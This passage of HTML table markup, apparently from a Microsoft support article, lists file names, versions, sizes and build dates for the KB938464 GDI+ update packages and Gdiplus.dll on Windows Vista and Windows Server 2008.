class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_0_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,410</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_0~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,429</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe_bf~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,414</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Package_for_kb938464_winpe~31bf3856ad364e35~x86~~6.0.1.5.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">1,433</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Update-bf.mum</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">3,493</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_2d7bed174b9ebd88201507c3a9559b8f_6595b64144ccf1df_1.0.6001.22170_none_709339f376bdc85f.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_706121a3a53151381e9f94344669d7b6_6595b64144ccf1df_1.0.6000.16683_none_adcecccda6b3ab77.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_82e7a5c853e9bbe90e9010703062a20b_6595b64144ccf1df_1.1.6000.16683_none_9bec08297484c7ec.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_962c1d07c894a4642bd456e614e026ef_6595b64144ccf1df_1.1.6001.22170_none_865d46dd24b8e4da.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_db062160e7e323dc6ed9b4cbfdafced4_6595b64144ccf1df_1.0.6001.18065_none_0264d72f0f33a6d4.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_e885f0ebde85b30bfc194c434e5e1061_6595b64144ccf1df_1.1.6001.18065_none_0a635ed693d8f3e2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_eda3cb8b9c8d566b30527aea60ea9777_6595b64144ccf1df_1.1.6000.20826_none_356c7025fd4daca2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_fb6256695ccf0fe48ed6fd5dfe69871e_6595b64144ccf1df_1.0.6000.20826_none_d2c7ba3b2c558bfd.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">627</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.16683_none_9ea0f08ac96e2537.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">05:57</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6000.20826_none_87cd0392e31b3a67.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:33</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.18065_none_9e7abe2ec9c13222.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:26</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.0.6001.22170_none_87ae89a0e3672b5a.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:56</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.16683_none_8df25f6f6273fede.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">06:00</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6000.20826_none_771e72777c21140e.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">03:38</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.18065_none_8dcc2d1362c70bc9.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">30-Apr-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">11:31</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">X86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.6001.22170_none_76fff8857c6d0501.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">4,160</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">04:02</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr></table></div><h4 class=\"sbody-h4\">Windows Server 2008 and Windows Vista, 64-bit versions</h4><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><th class=\"sbody-th\">File name</th><th class=\"sbody-th\">File version</th><th class=\"sbody-th\">File size</th><th class=\"sbody-th\">Date</th><th class=\"sbody-th\">Time</th><th class=\"sbody-th\">Platform</th></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.16683</td><td class=\"sbody-td\">2,189,312</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:33</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.20826</td><td class=\"sbody-td\">2,189,312</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:25</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.18065</td><td class=\"sbody-td\">2,190,848</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.22170</td><td class=\"sbody-td\">2,190,848</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.16683</td><td class=\"sbody-td\">2,332,160</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:33</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.20826</td><td class=\"sbody-td\">2,332,160</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:25</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.18065</td><td class=\"sbody-td\">2,332,160</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.22170</td><td class=\"sbody-td\">2,332,160</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:47</td><td class=\"sbody-td\">x64</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.16683</td><td class=\"sbody-td\">1,744,896</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6000.20826</td><td class=\"sbody-td\">1,744,896</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.18065</td><td class=\"sbody-td\">1,748,992</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">5.2.6001.22170</td><td class=\"sbody-td\">1,748,992</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.16683</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:24</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6000.20826</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:16</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.18065</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">30-Apr-2008</td><td class=\"sbody-td\">05:27</td><td class=\"sbody-td\">x86</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\">Gdiplus.dll</td><td class=\"sbody-td\">6.0.6001.22170</td><td class=\"sbody-td\">1,823,232</td><td class=\"sbody-td\">01-May-2008</td><td class=\"sbody-td\">03:22</td><td class=\"sbody-td\">x86</td></tr></table></div><div class=\"table-responsive\"><table class=\"sbody-table table\"><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_00b35f3bb498a220f1130c641ad53a3e_6595b64144ccf1df_1.0.6001.22170_none_a53a91c2bfe98529.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_014b1bb03e266dae9bb9229bbb64e9c8_6595b64144ccf1df_1.0.6000.20826_none_5b3447238e13d67c.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">922</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_0fc47c06392005dc7805a5f8cbccd688_6595b64144ccf1df_1.1.6000.20826_none_390d3d98cca7129b.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File size</span></td><td class=\"sbody-td\">631</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Date (UTC)</span></td><td class=\"sbody-td\">01-May-2008</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Time (UTC)</span></td><td class=\"sbody-td\">22:24</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">Platform</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"></td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File name</span></td><td class=\"sbody-td\">Amd64_19e8d2d57af2fb88aa5b1d1eb8bce30b_6595b64144ccf1df_1.1.6000.16683_none_2ad81ec9839d20c2.manifest</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span class=\"text-base\">File version</span></td><td class=\"sbody-td\">Not Applicable</td></tr><tr class=\"sbody-tr\"><td class=\"sbody-td\"><span 